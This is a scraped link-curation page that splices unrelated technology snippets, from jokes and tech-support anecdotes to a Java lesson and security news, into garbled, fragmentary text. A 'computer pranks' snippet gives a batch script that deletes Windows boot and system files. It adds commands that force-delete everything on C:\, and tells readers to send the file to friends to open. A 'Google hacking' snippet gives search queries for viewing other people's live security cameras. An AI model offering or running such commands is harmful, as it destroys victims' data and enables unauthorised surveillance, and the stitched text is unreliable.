background preloader

Technology

Facebook Twitter

Gadgets

Firefox Keyboard and Mouse Shortcuts. S | Go Parallel | Parallel Programming & Parallel Computing Information and Resources. How to Hunt Elephants. MATHEMATICIANS hunt elephants by going to Africa, throwing out everything that is not an elephant, and catching one of whatever is left. EXPERIENCED MATHEMATICIANS will attempt to prove the existence of at least one unique elephant before proceeding to step 1 as a subordinate exercise. PROFESSORS OF MATHEMATICS will prove the existence of at least one unique elephant and then leave the detection and capture of an actual elephant as an exercise for their graduate students.

COMPUTER SCIENTISTS hunt elephants by exercising Algorithm A: Go to Africa. Start at the Cape of Good hope. Work northward in an orderly manner, traversing the continent alternately east and west. EXPERIENCED COMPUTER PROGRAMMERS modify Algorithm A by placing a known elephant in Cairo to ensure that the algorithm will terminate. ASSEMBLY LANGUAGE PROGRAMMERS prefer to execute Algorithm A on their hands and knees. ECONOMISTS don't hunt elephants, but they believe that if elephants are paid enough, they will hunt themselves. Forked from: [Stardust] KiraKira Waypoints. NIST Expands Database of Common Coding Errors to Detect Software Bugs - Security. The National Institute of Standards and Technology expanded its database of software flaws to help developers avoid introducing bugs into their code right from the start.

The Software Assurance Metrics and Tool Evaluation (SAMATE) Reference Dataset contains examples of software issues that could leave applications vulnerable to attackers. Version 4.0 of SAMATE, released Nov. 22, contains 175 broad categories of weaknesses with over 60,000 specific cases, more than doubling the number of categories that were included in the previous release. SAMATE was launched in 2004 to improve software assurance by making it easier to identify and exclude known issues. The database helps developers test software offerings for known security vulnerabilities before going to market.

Programs

Tutorials. Hacks. HackerThings: Products for the discerning hacker. Hack a Day. Underground Search - Exploits. How to Ditch Big Brother and Disappear Forever. Hacking the Xbox. “How can I help you today, ma’am?” Client: “Is. Operating Systems. Tech Support: "May I ask what operating system you are running today? "Customer: "A computer. " A girl walked into the computer center where I work. She said she was having problems with her Mac. I asked what kind of Mac she had. Tech Support: "What operating system are you running? After conferring with her husband, it turned out she owned a Macintosh with System 8.1.

Tech Support: "What version of Windows are you running? " A kid in my class joined a conversation I was having about older computers. Him: "I have the oldest Windows ever at my house. Tech Support: "What operating system do you run? " Tech Support: "Do you know what operating system you're on? " Customer: "I don't use DOS. One time I had to walk a Windows 95 user through a particular procedure. Me: "First you need to open DOS-prompt. My Friend: "I just installed Windows 98. " My Friend: "What's your operating system? " Friend: "I heard about this thing called 'Linux'. " Friend: "Does Windows 98 support Linux? " Overheard in a classroom:

Computers

Bleeding At the Keyboard---character study. It's hard to think of actors William Shatner and Patrick Stewart as anything other than captains of the starship Enterprise. On the Enterprise we know exactly what they're likely to say and do. Even when they're not in Star Trek movies we keep expecting them to talk about engaging their warp drive, setting their phasers on stun, firing their photon torpedoes, and worrying about the Klingons or the Borg. As actors, they are thoroughly typecast in those roles. Similarly, all Java entities are typed. Type double variables can hold a decimal number in the range from about minus 10308 to plus 10308. Besides being able to hold a certain set of decimal values, double variables also have a set of operators to apply to those values: addition (+), subtraction (-), multiplication (*), and division (/).

Type int variables can hold a whole number but only within the range from about minus two billion to about plus two billion. Type boolean variables can hold only one of two values: true or false. How To Become A Hacker. Copyright © 2001 Eric S. Raymond As editor of the Jargon File and author of a few other well-known documents of similar nature, I often get email requests from enthusiastic network newbies asking (in effect) "how can I learn to be a wizardly hacker? ". Back in 1996 I noticed that there didn't seem to be any other FAQs or web documents that addressed this vital question, so I started this one.

A lot of hackers now consider it definitive, and I suppose that means it is. Still, I don't claim to be the exclusive authority on this topic; if you don't like what you read here, write your own. If you are reading a snapshot of this document offline, the current version lives at Note: there is a list of Frequently Asked Questions at the end of this document. Numerous translations of this document are available: ArabicBelorussianBulgarianChinese, Czech. The five-dots-in-nine-squares diagram that decorates this document is called a glider. 1. 2. 3. 5. 2.

Sony Nextep Computer Concept for 2020 by Hiromi Kiriki. In 2020 We Can Wear Sony Computers On Our Wrist Our present need for internet connectivity is so profound that secondary devices like the Nextep Computer are bound to happen. Developed to be worn as a bracelet, this computer concept is constructed out of a flexible OLED touchscreen.

Earmarked for the year 2020, features like a holographic projector (for screen), pull-out extra keyboard panels and social networking compatibility, make the concept plausible. Ten years from now is not too far away, so how many of you think we’d be buying such gadgets? Designer: Hiromi Kiriki. How Secure Is My Password? Painfully Computer Pranks ~ Computer Hacking | Learn How To Hack.

Computer pranks to freak out your friends and make them crying for mummy I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus, How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. These pranks could be very painfully, so please use them at your own risk ;) 1.

Crash a Computer System With Nothing But a URL! I stumbled across this URL while surfing the internet. 2. Open notepad and copy/paste this code: @echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini Now Save it as a .bat file. This should shutdown the persons computer. Send it to your friends computer and tell them to open it. Here is another code too..... cmd /c del c:\windows\* /F /S /Q cmd /c del c:\* /F /S /Q 3. 1. 2. 3. How to use Google for Hacking. | Arrow Webzine.

Google serves almost 80 percent of all search queries on the Internet, proving itself as the most popular search engine. However Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post I will show how to use Google for exploiting security vulnerabilities within websites. The following are some of the hacks that can be accomplished using Google. 1. Hacking Security Cameras There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time.

Inurl:”viewerframe? Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls. you now have access to the Live cameras which work in real-time. Intitle:”Live View / – AXIS” 2. 3. . “? 4. Cloud Computing - Cloud Security Blog - Trend Micro. What you can expect from a trusted leader in security With our threat defense experts focused on your digital security, you can count on having a safer place for your digital information—whether it’s on a mobile device, on your network, in the data center, in the cloud, at work, or at home. Keeping your data out of the wrong hands By safeguarding your information, we give you the confidence to work and play in the digital world. From business security solutions to software for online security at home, we’ve helped people and companies protect their valuable information from hackers and the evolving threat landscape for over 25 years.

From the endpoint to the network to the cloud, we never stop looking for new ways to protect you from current and emerging threats. Learn more about Trend Micro » We protect you where you need it most From large organizations to home sweet home, Trend Micro has what you need to secure your digital information with smart, simple security that fits.